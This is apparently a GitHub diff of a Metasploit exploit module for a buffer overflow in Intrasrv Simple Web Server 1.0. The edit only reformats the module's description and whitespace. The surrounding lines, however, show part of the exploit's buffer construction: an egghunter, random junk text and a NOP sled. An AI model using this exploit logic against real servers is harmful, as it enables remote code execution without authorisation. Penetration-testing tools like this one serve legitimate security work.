File tree Expand file tree Collapse file tree 1 file changed +6
-6
lines changed
modules/exploits/windows/http Expand file tree Collapse file tree 1 file changed +6
-6
lines changed Original file line number Diff line number Diff line change @@ -17,11 +17,11 @@ def initialize(info={})
17
17
super ( update_info ( info ,
18
18
'Name' => "Intrasrv 1.0 Buffer Overflow" ,
19
19
'Description' => %q{
20
- This module exploits a boundary condition error in Intrasrv
21
- Simple Web Server 1.0. The web interface does not validate the
22
- boundaries of an HTTP request string prior to copying the data
23
- to an insufficiently large buffer. Successful exploitation leads
24
- to arbitrary remote code execution in the context of the application.
20
+ This module exploits a boundary condition error in Intrasrv Simple Web
21
+ Server 1.0. The web interface does not validate the boundaries of an
22
+ HTTP request string prior to copying the data to an insufficiently large
23
+ buffer. Successful exploitation leads to arbitrary remote code execution
24
+ in the context of the application.
25
25
} ,
26
26
'License' => MSF_LICENSE ,
27
27
'Author' =>
@@ -86,7 +86,7 @@ def exploit
86
86
hunter , egg = generate_egghunter ( payload . encoded , payload_badchars , {
87
87
:checksum => true
88
88
} )
89
-
89
+
90
90
# setup buffer
91
91
buf = rand_text_alpha ( target [ 'Offset' ] -128 ) # junk to egghunter
92
92
buf << make_nops ( 8 ) + hunter # nopsled + egghunter at offset-128
You can’t perform that action at this time.
0 commit comments